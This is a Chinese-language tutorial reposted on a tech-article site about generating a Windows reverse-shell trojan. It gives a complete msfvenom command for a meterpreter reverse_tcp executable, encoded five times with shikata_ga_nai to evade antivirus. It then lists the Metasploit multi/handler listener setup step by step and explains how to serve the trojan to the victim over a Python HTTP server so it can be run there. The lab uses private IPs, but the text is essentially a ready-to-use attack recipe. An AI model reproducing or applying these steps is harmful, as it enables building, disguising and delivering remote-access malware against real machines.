栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

反弹shell---生成木马反弹shell(Windows)

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

反弹shell---生成木马反弹shell(Windows)

一、环境准备

使用到的机器:

系统IP地址描述
kali192.168.230.128监控机
Windows10192.168.230.131

靶机

使用到的工具:

MSF-Metasploit Framework(kali自带)

二、生成木马

使用到的命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.128  LPORT=4567  -e x86/shikata_ga_nai  -f exe -o  shell.exe  -i 5

命令解读:

-p添加载荷payload(选择与靶机相符的)
LHOST监控机的IP
LPORT监控机的端口
-e编码免杀
-f指定文件输出格式
-o文件输出(即文件名)
-i编码次数

注意:使用的端口一定是空闲端口,即未被使用的。

运行截图:

三、配置MSF监控

1.启动msf

终端中输入命令:msfconsole

2.载入监控模块

msf中输入命令:use exploit/multi/handler

3.加载payload

msf中输入命令:set payload windows/meterpreter/reverse_tcp

4.配置payload

msf中输入命令:show options

5.配置payload监控IP

msf中输入命令:set LHOST 192.168.230.128

6.配置payload监控端口

msf中输入命令:set LPORT 4567

7.再次查看payload配置

msf中输入命令:show options

 

8.执行监控

msf终端中输入:run

四、攻击利用

1.将木马上传到windows10靶机。

2.在靶机上执行木马。

3.在kali上查看,可以查看到windows10靶机的信息,成功实现反弹shell。

补充---一种上传到靶机的方法:

使用python,命令如下:

python2 -m SimpleHTTPServer 80
//注意80端口在未使用的情况下使用,80端口占用可以使用其他端口。

 然后在靶机的浏览器中输入监控机的IP地址,如果端口不是80后面加上端口。

例如:192.168.230.128:端口

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/860290.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号